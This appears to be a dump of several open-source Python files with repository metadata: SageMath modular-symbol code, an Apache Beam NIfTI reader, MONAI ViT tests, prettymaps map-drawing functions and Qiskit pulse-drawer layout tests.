sage: data = {M2Z([-2,-3,5,7]): S(0), M2Z([1,0,0,1]): S(0), M2Z([-1,-2,3,5]): S(0), M2Z([-1,-4,2,7]): S(1), M2Z([0,-1,1,4]): S(1), M2Z([-3,-1,7,2]): S(-1), M2Z([-2,-3,3,4]): S(0), M2Z([-4,-3,7,5]): S(0), M2Z([-1,-1,4,3]): S(0)}
sage: f = ManinMap(S,MR,data)
sage: f(M2Z([2,3,4,5]))
1
"""
a = A[t00]
b = A[t01]
c = A[t10]
d = A[t11]
# v1: a list of unimodular matrices whose divisors add up to {b/d} - {infty}
v1 = unimod_matrices_to_infty(b, d)
# v2: a list of unimodular matrices whose divisors add up to {a/c} - {infty}
v2 = unimod_matrices_to_infty(a, c)
# ans: the value of self on A
ans = self._codomain(0)
# This loop computes self({b/d}-{infty}) by adding up the values of self on elements of v1
for B in v1:
ans = ans + self._eval_sl2(B)
# This loops subtracts away the value self({a/c}-{infty}) from ans by subtracting away the values of self on elements of v2
# and so in the end ans becomes self({b/d}-{a/c}) = self({A(0)} - {A(infty)}
for B in v2:
ans = ans - self._eval_sl2(B)
return ans.normalize()
def apply(self, f, codomain=None, to_moments=False):
r"""
Return Manin map given by `x \mapsto f(self(x))`, where `f` is
anything that can be called with elements of the coefficient
module.
This might be used to normalize, reduce modulo a prime, change
base ring, etc.
INPUT:
- ``f`` -- anything that can be called with elements of the coefficient module
- ``codomain`` -- (default: None) the codomain of the return map
- ``to_moments`` -- (default: False) if True, will apply ``f`` to each of the moments instead
EXAMPLES::
sage: from sage.modular.pollack_stevens.manin_map import M2Z, ManinMap
sage: from sage.modular.pollack_stevens.fund_domain import ManinRelations
sage: S = Symk(0,QQ)
sage: MR = ManinRelations(37)
sage: data = {M2Z([-2,-3,5,7]): S(0), M2Z([1,0,0,1]): S(0), M2Z([-1,-2,3,5]): S(0), M2Z([-1,-4,2,7]): S(1), M2Z([0,-1,1,4]): S(1), M2Z([-3,-1,7,2]): S(-1), M2Z([-2,-3,3,4]): S(0), M2Z([-4,-3,7,5]): S(0), M2Z([-1,-1,4,3]): S(0)}
sage: f = ManinMap(S,MR,data)
sage: list(f.apply(lambda t:2*t))
[0, 2, 0, 0, 0, -2, 2, 0, 0]
"""
D = {}
sd = self._dict
if codomain is None:
codomain = self._codomain
for ky, val in sd.iteritems():
if to_moments:
D[ky] = codomain([f(val.moment(a))
for a in range(val.precision_absolute())])
else:
D[ky] = f(val)
return self.__class__(codomain, self._manin, D, check=False)
def __iter__(self):
r"""
Return iterator over the values of this map on the reduced
representatives.
This might be used to compute the valuation.
EXAMPLES::
sage: from sage.modular.pollack_stevens.manin_map import M2Z, ManinMap
sage: from sage.modular.pollack_stevens.fund_domain import ManinRelations
sage: S = Symk(0,QQ)
sage: MR = ManinRelations(37)
sage: data = {M2Z([-2,-3,5,7]): S(0), M2Z([1,0,0,1]): S(0), M2Z([-1,-2,3,5]): S(0), M2Z([-1,-4,2,7]): S(1), M2Z([0,-1,1,4]): S(1), M2Z([-3,-1,7,2]): S(-1), M2Z([-2,-3,3,4]): S(0), M2Z([-4,-3,7,5]): S(0), M2Z([-1,-1,4,3]): S(0)}
sage: f = ManinMap(S,MR,data)
sage: [a for a in f]
[0, 1, 0, 0, 0, -1, 1, 0, 0]
"""
for A in self._manin.gens():
yield self._dict[A]
def _right_action(self, gamma):
r"""
Return `self | \gamma`, where `\gamma` is a `2 \times 2` integer matrix.
The action is defined by `(self | \gamma)(D) = self(\gamma D)|\gamma`
For the action by a single element `\gamma` to be a modular symbol, `\gamma`
must normalize `\Gamma_0(N)`. However, this right action
can also be used to define Hecke operators, in which case each
individual `self | \gamma` is not a modular symbol on `\Gamma_0(N)`, but
the sum over acting by the appropriate double coset representatives is.
INPUT:
- ``gamma`` - `2 \times 2` integer matrix of nonzero determinant, with a
well-defined action on the coefficient module
OUTPUT:
- the image of self under the action of `\gamma` -- a Manin map.
EXAMPLES::
sage: from sage.modular.pollack_stevens.manin_map import ManinMap, M2Z, Sigma0
sage: from sage.modular.pollack_stevens.space import ps_modsym_from_simple_modsym_space
sage: S01 = Sigma0(1)
sage: f = Newforms(7, 4)[0]
sage: f.modular_symbols(1)
Modular Symbols subspace of dimension 1 of Modular Symbols space of dimension 3 for Gamma_0(7) of weight 4 with sign 1 over Rational Field
sage: phi = ps_modsym_from_simple_modsym_space(f.modular_symbols(1))._map
sage: psi = phi._right_action(S01([2,3,4,5])); psi
Map from the set of right cosets of Gamma0(7) in SL_2(Z) to Sym^2 Q^2
sage: from sage.modular.pollack_stevens.space import ps_modsym_from_simple_modsym_space
sage: M = ModularSymbols(17,4,1).cuspidal_subspace()
sage: A = M.decomposition()
sage: f = ps_modsym_from_simple_modsym_space(A[0])._map
sage: g = f._right_action(S01([1,2,0,1]))
sage: g
Map from the set of right cosets of Gamma0(17) in SL_2(Z) to Sym^2 Q^2
sage: x = sage.modular.pollack_stevens.fund_domain.M2Z([2,3,1,0])
sage: g(x)
(17, -34, 69)
"""
D = {}
sd = self._dict
# we should eventually replace the for loop with a call to apply_many
keys = [ky for ky in sd.iterkeys()]
for ky in keys:
D[ky] = self(gamma * ky) * gamma
return self.__class__(self._codomain, self._manin, D, check=False)
def normalize(self):
r"""
Normalize every value of self -- e.g., reduces each value's
`j`-th moment modulo `p^{N-j}`
EXAMPLES::
sage: from sage.modular.pollack_stevens.manin_map import M2Z, ManinMap
sage: D = OverconvergentDistributions(0, 11, 10)
sage: manin = sage.modular.pollack_stevens.fund_domain.ManinRelations(11)
sage: data = {M2Z([1,0,0,1]):D([1,2]), M2Z([0,-1,1,3]):D([3,5]), M2Z([-1,-1,3,2]):D([1,1])}
sage: f = ManinMap(D, manin, data)
sage: f._dict[M2Z([1,0,0,1])]
(1 + O(11^2), 2 + O(11))
sage: g = f.normalize()
sage: g._dict[M2Z([1,0,0,1])]
(1 + O(11^2), 2 + O(11))
"""
sd = self._dict
for val in sd.itervalues():
val.normalize()
return self
def reduce_precision(self, M):
r"""
Reduce the precision of all the values of the Manin map.
INPUT:
- ``M`` -- an integer, the new precision.
EXAMPLES::
sage: from sage.modular.pollack_stevens.manin_map import M2Z, ManinMap
sage: D = OverconvergentDistributions(0, 11, 10)
sage: manin = sage.modular.pollack_stevens.fund_domain.ManinRelations(11)
sage: data = {M2Z([1,0,0,1]):D([1,2]), M2Z([0,-1,1,3]):D([3,5]), M2Z([-1,-1,3,2]):D([1,1])}
sage: f = ManinMap(D, manin, data)
sage: f._dict[M2Z([1,0,0,1])]
(1 + O(11^2), 2 + O(11))
sage: g = f.reduce_precision(1)
sage: g._dict[M2Z([1,0,0,1])]
1 + O(11^2)
"""
D = {}
sd = self._dict
for ky, val in sd.iteritems():
D[ky] = val.reduce_precision(M)
return self.__class__(self._codomain, self._manin, D, check=False)
def specialize(self, *args):
r"""
Specialize all the values of the Manin map to a new coefficient
module. Assumes that the codomain has a ``specialize`` method, and
passes all its arguments to that method.
EXAMPLES::
sage: from sage.modular.pollack_stevens.manin_map import M2Z, ManinMap
sage: D = OverconvergentDistributions(0, 11, 10)
sage: manin = sage.modular.pollack_stevens.fund_domain.ManinRelations(11)
sage: data = {M2Z([1,0,0,1]):D([1,2]), M2Z([0,-1,1,3]):D([3,5]), M2Z([-1,-1,3,2]):D([1,1])}
sage: f = ManinMap(D, manin, data)
sage: g = f.specialize()
sage: g._codomain
Sym^0 Z_11^2
"""
D = {}
sd = self._dict
for ky, val in sd.iteritems():
D[ky] = val.specialize(*args)
return self.__class__(self._codomain.specialize(*args), self._manin,
D, check=False)
def hecke(self, ell, algorithm = 'prep'):
r"""
Return the image of this Manin map under the Hecke operator `T_{\ell}`.
INPUT:
- ``ell`` -- a prime
- ``algorithm`` -- a string, either 'prep' (default) or
'naive'
OUTPUT:
- The image of this ManinMap under the Hecke operator
`T_{\ell}`
EXAMPLES::
sage: E = EllipticCurve('11a')
sage: phi = E.pollack_stevens_modular_symbol()
sage: phi.values()
[-1/5, 1, 0]
sage: phi.is_Tq_eigensymbol(7,7,10)
True
sage: phi.hecke(7).values()
[2/5, -2, 0]
sage: phi.Tq_eigenvalue(7,7,10)
-2
"""
self.compute_full_data()
self.normalize()
M = self._manin
if algorithm == 'prep':
## psi will denote self | T_ell
psi = {}
for g in M.gens():
psi_g = sum((self[h] * A for h, A in M.prep_hecke_on_gen_list(ell, g)), self._codomain(0))
psi_g.normalize()
psi[g] = psi_g
return self.__class__(self._codomain, self._manin,
psi, check=False).normalize()
elif algorithm == 'naive':
S0N = Sigma0(self._manin.level())
psi = self._right_action(S0N([1, 0, 0, ell]))
for a in range(1, ell):
psi += self._right_action(S0N([1, a, 0, ell]))
if self._manin.level() % ell != 0:
psi += self._right_action(S0N([ell, 0, 0, 1]))
return psi.normalize()
else:
raise ValueError('Algorithm must be either "naive" or "prep"')
def p_stabilize(self, p, alpha, V):
r"""
Return the `p`-stablization of self to level `N*p` on which
`U_p` acts by `\alpha`.
INPUT:
- ``p`` -- a prime.
- ``alpha`` -- a `U_p`-eigenvalue.
- ``V`` -- a space of modular symbols.
OUTPUT:
- The image of this ManinMap under the Hecke operator `T_{\ell}`
EXAMPLES::
sage: E = EllipticCurve('11a')
sage: phi = E.pollack_stevens_modular_symbol()
sage: f = phi._map
sage: V = phi.parent()
sage: f.p_stabilize(5,1,V)
Map from the set of right cosets of Gamma0(11) in SL_2(Z) to Sym^0 Q^2
"""
manin = V.source()
S0 = Sigma0(self._codomain._act._Np)
pmat = S0([p, 0, 0, 1])
D = {}
scalar = 1 / alpha
W = self._codomain.change_ring(scalar.parent())
for g in map(M2Z, manin.gens()):
# we use scale here so that we do not need to define a
# construction functor in order to scale by something
# outside the base ring.
D[g] = W(self._eval_sl2(g) - (self(pmat * g) * pmat).scale(scalar))
ans = self.__class__(W, manin, D, check=False)
return ans
| 39.58912
| 240
| 0.54036
|
e1331642db598a428668a360e315e979f4be73f2
| 1,713
|
py
|
Python
|
healthybrains/inputoutput.py
|
Enucatl/machine-learning-healthy-brains
|
bfedc36c1e5657d97e838d9d58ba26af14f703c7
|
[
"MIT"
] | null | null | null |
healthybrains/inputoutput.py
|
Enucatl/machine-learning-healthy-brains
|
bfedc36c1e5657d97e838d9d58ba26af14f703c7
|
[
"MIT"
] | null | null | null |
healthybrains/inputoutput.py
|
Enucatl/machine-learning-healthy-brains
|
bfedc36c1e5657d97e838d9d58ba26af14f703c7
|
[
"MIT"
] | null | null | null |
import io
import nibabel as nb
import numpy as np
import apache_beam as beam
import os
class _Nifti1Source(beam.io.filebasedsource.FileBasedSource):
def __init__(self, file_pattern, min_bundle_size):
super(_Nifti1Source, self).__init__(
file_pattern=file_pattern,
min_bundle_size=min_bundle_size,
splittable=False)
def read_records(self, file_name, range_tracker):
with self.open_file(file_name) as f:
hdr_fh = nb.fileholders.FileHolder(fileobj=f)
header = nb.Nifti1Image.header_class.from_fileobj(f)
array_proxy = header.data_from_fileobj(f)
data = array_proxy[..., 0]
yield (file_name, data)
class ReadNifti1(beam.transforms.PTransform):
def __init__(self,
file_pattern=None,
min_bundle_size=0
):
super(ReadNifti1, self).__init__()
self._file_pattern = file_pattern
self._min_bundle_size = min_bundle_size
def apply(self, pcoll):
return pcoll.pipeline | beam.io.Read(
_Nifti1Source(
file_pattern=self._file_pattern,
min_bundle_size=self._min_bundle_size))
def fake_data((file_name, data)):
return file_name, np.arange(10), np.arange(10)
def thickness_data_to_string((file_name, thickness)):
output_string = io.BytesIO()
np.save(output_string, np.array([file_name]))
np.save(output_string, thickness)
final_string = output_string.getvalue()
return final_string
def id_from_file_name(file_name):
basename = os.path.splitext(os.path.basename(file_name))[0]
file_id = int(basename.split("_")[1])
return file_id
| 29.534483
| 64
| 0.665499
|
0dce73b0cbc3458c202000941565586e5fafcc8a
| 5,336
|
py
|
Python
|
tests/test_vit.py
|
madil90/MONAI
|
2f1c7a5d1b47c8dd21681dbe1b67213aa3278cd7
|
[
"Apache-2.0"
] | 1
|
2021-08-20T01:54:26.000Z
|
2021-08-20T01:54:26.000Z
|
tests/test_vit.py
|
madil90/MONAI
|
2f1c7a5d1b47c8dd21681dbe1b67213aa3278cd7
|
[
"Apache-2.0"
] | null | null | null |
tests/test_vit.py
|
madil90/MONAI
|
2f1c7a5d1b47c8dd21681dbe1b67213aa3278cd7
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2020 - 2021 MONAI Consortium
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
import torch
from parameterized import parameterized
from monai.networks import eval_mode
from monai.networks.nets.vit import ViT
TEST_CASE_Vit = []
for dropout_rate in [0.6]:
for in_channels in [4]:
for hidden_size in [768]:
for img_size in [96, 128]:
for patch_size in [16]:
for num_heads in [12]:
for mlp_dim in [3072]:
for num_layers in [4]:
for num_classes in [2]:
for pos_embed in ["conv"]:
# for classification in [False, True]: # TODO: test classification
for nd in (2, 3):
test_case = [
{
"in_channels": in_channels,
"img_size": (img_size,) * nd,
"patch_size": (patch_size,) * nd,
"hidden_size": hidden_size,
"mlp_dim": mlp_dim,
"num_layers": num_layers,
"num_heads": num_heads,
"pos_embed": pos_embed,
"classification": False,
"num_classes": num_classes,
"dropout_rate": dropout_rate,
},
(2, in_channels, *([img_size] * nd)),
(2, (img_size // patch_size) ** nd, hidden_size),
]
if nd == 2:
test_case[0]["spatial_dims"] = 2 # type: ignore
TEST_CASE_Vit.append(test_case)
class TestPatchEmbeddingBlock(unittest.TestCase):
@parameterized.expand(TEST_CASE_Vit)
def test_shape(self, input_param, input_shape, expected_shape):
net = ViT(**input_param)
with eval_mode(net):
result, _ = net(torch.randn(input_shape))
self.assertEqual(result.shape, expected_shape)
def test_ill_arg(self):
with self.assertRaises(ValueError):
ViT(
in_channels=1,
img_size=(128, 128, 128),
patch_size=(16, 16, 16),
hidden_size=128,
mlp_dim=3072,
num_layers=12,
num_heads=12,
pos_embed="conv",
classification=False,
dropout_rate=5.0,
)
with self.assertRaises(ValueError):
ViT(
in_channels=1,
img_size=(32, 32, 32),
patch_size=(64, 64, 64),
hidden_size=512,
mlp_dim=3072,
num_layers=12,
num_heads=8,
pos_embed="perceptron",
classification=False,
dropout_rate=0.3,
)
with self.assertRaises(ValueError):
ViT(
in_channels=1,
img_size=(96, 96, 96),
patch_size=(8, 8, 8),
hidden_size=512,
mlp_dim=3072,
num_layers=12,
num_heads=14,
pos_embed="conv",
classification=False,
dropout_rate=0.3,
)
with self.assertRaises(ValueError):
ViT(
in_channels=1,
img_size=(97, 97, 97),
patch_size=(4, 4, 4),
hidden_size=768,
mlp_dim=3072,
num_layers=12,
num_heads=8,
pos_embed="perceptron",
classification=False,
dropout_rate=0.3,
)
with self.assertRaises(ValueError):
ViT(
in_channels=4,
img_size=(96, 96, 96),
patch_size=(16, 16, 16),
hidden_size=768,
mlp_dim=3072,
num_layers=12,
num_heads=12,
pos_embed="perc",
classification=False,
dropout_rate=0.3,
)
if __name__ == "__main__":
unittest.main()
| 38.948905
| 107
| 0.431222
|
6d715a141b52afcd1bdb3b095a830788105eaec5
| 8,242
|
py
|
Python
|
prettymaps/draw.py
|
sofia-ab/prettymaps
|
f223c859d5231954ab29794a901844b37539c017
|
[
"MIT"
] | 1
|
2021-08-31T16:28:16.000Z
|
2021-08-31T16:28:16.000Z
|
prettymaps/draw.py
|
stsievert/prettymaps
|
47c5d01e093ccf93ef6582a13bfe894ce0f5b2fa
|
[
"MIT"
] | null | null | null |
prettymaps/draw.py
|
stsievert/prettymaps
|
47c5d01e093ccf93ef6582a13bfe894ce0f5b2fa
|
[
"MIT"
] | null | null | null |
import re
from collections.abc import Iterable
import osmnx as ox
import pandas as pd
from geopandas import GeoDataFrame
import numpy as np
from numpy.random import choice
from shapely.geometry import Polygon, MultiPolygon, MultiLineString, GeometryCollection
from shapely.affinity import translate, scale, rotate
from descartes import PolygonPatch
from tabulate import tabulate
from IPython.display import Markdown, display
from .fetch import get_perimeter, get_layer
# Helper functions
def get_hash(key):
return frozenset(key.items()) if type(key) == dict else key
# Drawing functions
def show_palette(palette, description = ''):
'''
Helper to display palette in Markdown
'''
colorboxes = [
f''
for c in palette
]
display(Markdown((description)))
display(Markdown(tabulate(pd.DataFrame(colorboxes), showindex = False)))
def get_patch(shape, **kwargs):
'''
Convert shapely object to matplotlib patch
'''
#if type(shape) == Path:
# return patches.PathPatch(shape, **kwargs)
if type(shape) == Polygon and shape.area > 0:
return PolygonPatch(list(zip(*shape.exterior.xy)), **kwargs)
else:
return None
# Plot a single shape
def plot_shape(shape, ax, vsketch = None, **kwargs):
'''
Plot shapely object
'''
if isinstance(shape, Iterable) and type(shape) != MultiLineString:
for shape_ in shape:
plot_shape(shape_, ax, vsketch = vsketch, **kwargs)
else:
if not shape.is_empty:
if vsketch is None:
ax.add_patch(PolygonPatch(shape, **kwargs))
else:
if ('draw' not in kwargs) or kwargs['draw']:
if 'stroke' in kwargs:
vsketch.stroke(kwargs['stroke'])
else:
vsketch.stroke(1)
if 'penWidth' in kwargs:
vsketch.penWidth(kwargs['penWidth'])
else:
vsketch.penWidth(0.3)
if 'fill' in kwargs:
vsketch.fill(kwargs['fill'])
else:
vsketch.noFill()
vsketch.geometry(shape)
# Plot a collection of shapes
def plot_shapes(shapes, ax, vsketch = None, palette = None, **kwargs):
'''
Plot collection of shapely objects (optionally, use a color palette)
'''
if not isinstance(shapes, Iterable):
shapes = [shapes]
for shape in shapes:
if palette is None:
plot_shape(shape, ax, vsketch = vsketch, **kwargs)
else:
plot_shape(shape, ax, vsketch = vsketch, fc = choice(palette), **kwargs)
# Parse query (by coordinates, OSMId or name)
def parse_query(query):
if isinstance(query, GeoDataFrame):
return 'polygon'
elif isinstance(query, tuple):
return 'coordinates'
elif re.match('''[A-Z][0-9]+''', query):
return 'osmid'
else:
return 'address'
# Apply transformation (translation & scale) to layers
def transform(layers, x, y, scale_x, scale_y, rotation):
# Transform layers (translate & scale)
k, v = zip(*layers.items())
v = GeometryCollection(v)
if (x is not None) and (y is not None):
v = translate(v, *(np.array([x, y]) - np.concatenate(v.centroid.xy)))
if scale_x is not None:
v = scale(v, scale_x, 1)
if scale_y is not None:
v = scale(v, 1, scale_y)
if rotation is not None:
v = rotate(v, rotation)
layers = dict(zip(k, v))
return layers
def draw_text(ax, text, x, y, **kwargs):
ax.text(x, y, text, **kwargs)
# Plot
def plot(
# Address
query,
# Whether to use a backup for the layers
backup = None,
# Custom postprocessing function on layers
postprocessing = None,
# Radius (in case of circular plot)
radius = None,
# Which layers to plot
layers = {'perimeter': {}},
# Drawing params for each layer (matplotlib params such as 'fc', 'ec', 'fill', etc.)
drawing_kwargs = {},
# OSM Caption parameters
osm_credit = {},
# Figure parameters
figsize = (10, 10), ax = None, title = None,
# Vsketch parameters
vsketch = None,
# Transform (translation & scale) params
x = None, y = None, scale_x = None, scale_y = None, rotation = None,
):
# Interpret query
query_mode = parse_query(query)
# Save maximum dilation for later use
dilations = [kwargs['dilate'] for kwargs in layers.values() if 'dilate' in kwargs]
max_dilation = max(dilations) if len(dilations) > 0 else 0
####################
### Fetch Layers ###
####################
# Use backup if provided
if backup is not None:
layers = backup
# Otherwise, fetch layers
else:
# Define base kwargs
if radius:
base_kwargs = {
'point': query if query_mode == 'coordinates' else ox.geocode(query),
'radius': radius
}
else:
base_kwargs = {
'perimeter': query if query_mode == 'polygon' else get_perimeter(query, by_osmid = query_mode == 'osmid')
}
# Fetch layers
layers = {
layer: get_layer(
layer,
**base_kwargs,
**(kwargs if type(kwargs) == dict else {})
)
for layer, kwargs in layers.items()
}
# Apply transformation to layers (translate & scale)
layers = transform(layers, x, y, scale_x, scale_y, rotation)
# Apply postprocessing step to layers
if postprocessing is not None:
layers = postprocessing(layers)
############
### Plot ###
############
# Matplot-specific stuff (only run if vsketch mode isn't activated)
if vsketch is None:
# Ajust axis
ax.axis('off')
ax.axis('equal')
ax.autoscale()
# Plot background
if 'background' in drawing_kwargs:
xmin, ymin, xmax, ymax = layers['perimeter'].bounds
geom = scale(Polygon([
(xmin, ymin),
(xmin, ymax),
(xmax, ymax),
(xmax, ymin)
]), 2, 2)
if vsketch is None:
ax.add_patch(PolygonPatch(geom, **drawing_kwargs['background']))
else:
vsketch.geometry(geom)
# Adjust bounds
xmin, ymin, xmax, ymax = layers['perimeter'].buffer(max_dilation).bounds
dx, dy = xmax-xmin, ymax-ymin
if vsketch is None:
ax.set_xlim(xmin, xmax)
ax.set_ylim(ymin, ymax)
# Draw layers
for layer, shapes in layers.items():
kwargs = drawing_kwargs[layer] if layer in drawing_kwargs else {}
if 'hatch_c' in kwargs:
# Draw hatched shape
plot_shapes(shapes, ax, vsketch = vsketch, lw = 0, ec = kwargs['hatch_c'], **{k:v for k,v in kwargs.items() if k not in ['lw', 'ec', 'hatch_c']})
# Draw shape contour only
plot_shapes(shapes, ax, vsketch = vsketch, fill = False, **{k:v for k,v in kwargs.items() if k not in ['hatch_c', 'hatch', 'fill']})
else:
# Draw shape normally
plot_shapes(shapes, ax, vsketch = vsketch, **kwargs)
if ((isinstance(osm_credit, dict)) or (osm_credit is True)) and (vsketch is None):
x, y = figsize
d = .8*(x**2+y**2)**.5
draw_text(
ax,
(osm_credit['text'] if 'text' in osm_credit else 'data © OpenStreetMap contributors\ngithub.com/marceloprates/prettymaps'),
x = xmin + (osm_credit['x']*dx if 'x' in osm_credit else 0),
y = ymax - 4*d - (osm_credit['y']*dy if 'y' in osm_credit else 0),
fontfamily = (osm_credit['fontfamily'] if 'fontfamily' in osm_credit else 'Ubuntu Mono'),
fontsize = (osm_credit['fontsize']*d if 'fontsize' in osm_credit else d),
zorder = (osm_credit['zorder'] if 'zorder' in osm_credit else len(layers)+1),
**{k:v for k,v in osm_credit.items() if k not in ['text', 'x', 'y', 'fontfamily', 'fontsize', 'zorder']}
)
# Return perimeter
return layers
| 32.577075
| 157
| 0.577651
|
537227109d4cd709faf42599c9e608d841118cc1
| 8,515
|
py
|
Python
|
test/python/visualization/pulse_v2/test_layouts.py
|
Roshan-Thomas/qiskit-terra
|
77219b5c7b7146b1545c5e5190739b36f4064b2f
|
[
"Apache-2.0"
] | 1,599
|
2018-07-10T10:59:12.000Z
|
2022-03-31T23:56:25.000Z
|
test/python/visualization/pulse_v2/test_layouts.py
|
Roshan-Thomas/qiskit-terra
|
77219b5c7b7146b1545c5e5190739b36f4064b2f
|
[
"Apache-2.0"
] | 5,244
|
2018-07-10T06:20:13.000Z
|
2022-03-31T22:18:48.000Z
|
test/python/visualization/pulse_v2/test_layouts.py
|
Roshan-Thomas/qiskit-terra
|
77219b5c7b7146b1545c5e5190739b36f4064b2f
|
[
"Apache-2.0"
] | 1,409
|
2018-07-10T02:16:12.000Z
|
2022-03-31T09:01:32.000Z
|
# This code is part of Qiskit.
#
# (C) Copyright IBM 2020.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""Tests for core modules of pulse drawer."""
from qiskit import pulse
from qiskit.test import QiskitTestCase
from qiskit.visualization.pulse_v2 import layouts, device_info
class TestChannelArrangement(QiskitTestCase):
"""Tests for channel mapping functions."""
def setUp(self) -> None:
super().setUp()
self.channels = [
pulse.DriveChannel(0),
pulse.DriveChannel(1),
pulse.DriveChannel(2),
pulse.MeasureChannel(1),
pulse.MeasureChannel(2),
pulse.AcquireChannel(1),
pulse.AcquireChannel(2),
pulse.ControlChannel(0),
pulse.ControlChannel(2),
pulse.ControlChannel(5),
]
self.formatter = {"control.show_acquire_channel": True}
self.device = device_info.OpenPulseBackendInfo(
name="test",
dt=1,
channel_frequency_map={
pulse.DriveChannel(0): 5.0e9,
pulse.DriveChannel(1): 5.1e9,
pulse.DriveChannel(2): 5.2e9,
pulse.MeasureChannel(1): 7.0e9,
pulse.MeasureChannel(1): 7.1e9,
pulse.MeasureChannel(2): 7.2e9,
pulse.ControlChannel(0): 5.0e9,
pulse.ControlChannel(1): 5.1e9,
pulse.ControlChannel(2): 5.2e9,
pulse.ControlChannel(3): 5.3e9,
pulse.ControlChannel(4): 5.4e9,
pulse.ControlChannel(5): 5.5e9,
},
qubit_channel_map={
0: [
pulse.DriveChannel(0),
pulse.MeasureChannel(0),
pulse.AcquireChannel(0),
pulse.ControlChannel(0),
],
1: [
pulse.DriveChannel(1),
pulse.MeasureChannel(1),
pulse.AcquireChannel(1),
pulse.ControlChannel(1),
],
2: [
pulse.DriveChannel(2),
pulse.MeasureChannel(2),
pulse.AcquireChannel(2),
pulse.ControlChannel(2),
pulse.ControlChannel(3),
pulse.ControlChannel(4),
],
3: [
pulse.DriveChannel(3),
pulse.MeasureChannel(3),
pulse.AcquireChannel(3),
pulse.ControlChannel(5),
],
},
)
def test_channel_type_grouped_sort(self):
"""Test channel_type_grouped_sort."""
out_layout = layouts.channel_type_grouped_sort(
self.channels, formatter=self.formatter, device=self.device
)
ref_channels = [
[pulse.DriveChannel(0)],
[pulse.DriveChannel(1)],
[pulse.DriveChannel(2)],
[pulse.ControlChannel(0)],
[pulse.ControlChannel(2)],
[pulse.ControlChannel(5)],
[pulse.MeasureChannel(1)],
[pulse.MeasureChannel(2)],
[pulse.AcquireChannel(1)],
[pulse.AcquireChannel(2)],
]
ref_names = ["D0", "D1", "D2", "U0", "U2", "U5", "M1", "M2", "A1", "A2"]
ref = list(zip(ref_names, ref_channels))
self.assertListEqual(list(out_layout), ref)
def test_channel_index_sort(self):
"""Test channel_index_grouped_sort."""
out_layout = layouts.channel_index_grouped_sort(
self.channels, formatter=self.formatter, device=self.device
)
ref_channels = [
[pulse.DriveChannel(0)],
[pulse.ControlChannel(0)],
[pulse.DriveChannel(1)],
[pulse.MeasureChannel(1)],
[pulse.AcquireChannel(1)],
[pulse.DriveChannel(2)],
[pulse.ControlChannel(2)],
[pulse.MeasureChannel(2)],
[pulse.AcquireChannel(2)],
[pulse.ControlChannel(5)],
]
ref_names = ["D0", "U0", "D1", "M1", "A1", "D2", "U2", "M2", "A2", "U5"]
ref = list(zip(ref_names, ref_channels))
self.assertListEqual(list(out_layout), ref)
def test_channel_index_sort_grouped_control(self):
"""Test channel_index_grouped_sort_u."""
out_layout = layouts.channel_index_grouped_sort_u(
self.channels, formatter=self.formatter, device=self.device
)
ref_channels = [
[pulse.DriveChannel(0)],
[pulse.DriveChannel(1)],
[pulse.MeasureChannel(1)],
[pulse.AcquireChannel(1)],
[pulse.DriveChannel(2)],
[pulse.MeasureChannel(2)],
[pulse.AcquireChannel(2)],
[pulse.ControlChannel(0)],
[pulse.ControlChannel(2)],
[pulse.ControlChannel(5)],
]
ref_names = ["D0", "D1", "M1", "A1", "D2", "M2", "A2", "U0", "U2", "U5"]
ref = list(zip(ref_names, ref_channels))
self.assertListEqual(list(out_layout), ref)
def test_channel_qubit_index_sort(self):
"""Test qubit_index_sort."""
out_layout = layouts.qubit_index_sort(
self.channels, formatter=self.formatter, device=self.device
)
ref_channels = [
[pulse.DriveChannel(0), pulse.ControlChannel(0)],
[pulse.DriveChannel(1), pulse.MeasureChannel(1)],
[pulse.DriveChannel(2), pulse.MeasureChannel(2), pulse.ControlChannel(2)],
[pulse.ControlChannel(5)],
]
ref_names = ["Q0", "Q1", "Q2", "Q3"]
ref = list(zip(ref_names, ref_channels))
self.assertListEqual(list(out_layout), ref)
class TestHorizontalAxis(QiskitTestCase):
"""Tests for horizontal axis mapping functions."""
def test_time_map_in_ns(self):
"""Test for time_map_in_ns."""
time_window = (0, 1000)
breaks = [(100, 200)]
dt = 1e-9
haxis = layouts.time_map_in_ns(time_window=time_window, axis_breaks=breaks, dt=dt)
self.assertListEqual(list(haxis.window), [0, 900])
self.assertListEqual(list(haxis.axis_break_pos), [100])
ref_axis_map = {
0.0: "0",
180.0: "280",
360.0: "460",
540.0: "640",
720.0: "820",
900.0: "1000",
}
self.assertDictEqual(haxis.axis_map, ref_axis_map)
self.assertEqual(haxis.label, "Time (ns)")
def test_time_map_in_without_dt(self):
"""Test for time_map_in_ns when dt is not provided."""
time_window = (0, 1000)
breaks = [(100, 200)]
dt = None
haxis = layouts.time_map_in_ns(time_window=time_window, axis_breaks=breaks, dt=dt)
self.assertListEqual(list(haxis.window), [0, 900])
self.assertListEqual(list(haxis.axis_break_pos), [100])
ref_axis_map = {
0.0: "0",
180.0: "280",
360.0: "460",
540.0: "640",
720.0: "820",
900.0: "1000",
}
self.assertDictEqual(haxis.axis_map, ref_axis_map)
self.assertEqual(haxis.label, "System cycle time (dt)")
class TestFigureTitle(QiskitTestCase):
"""Tests for figure title generation."""
def setUp(self) -> None:
super().setUp()
self.device = device_info.OpenPulseBackendInfo(name="test_backend", dt=1e-9)
self.prog = pulse.Schedule(name="test_sched")
self.prog.insert(
0, pulse.Play(pulse.Constant(100, 0.1), pulse.DriveChannel(0)), inplace=True
)
def detail_title(self):
"""Test detail_title layout function."""
ref_title = "Name: test_sched, Duration: 100.0 ns, Backend: test_backend"
out = layouts.detail_title(self.prog, self.device)
self.assertEqual(out, ref_title)
def empty_title(self):
"""Test empty_title layout function."""
ref_title = ""
out = layouts.detail_title(self.prog, self.device)
self.assertEqual(out, ref_title)
| 34.196787
| 90
| 0.556782
|
b4d475fffcbaa05906a8f3d4824e99bca0bb0c5a
| 4,730
|
py
|
Python
|
eim/small_problems_dists.py
|
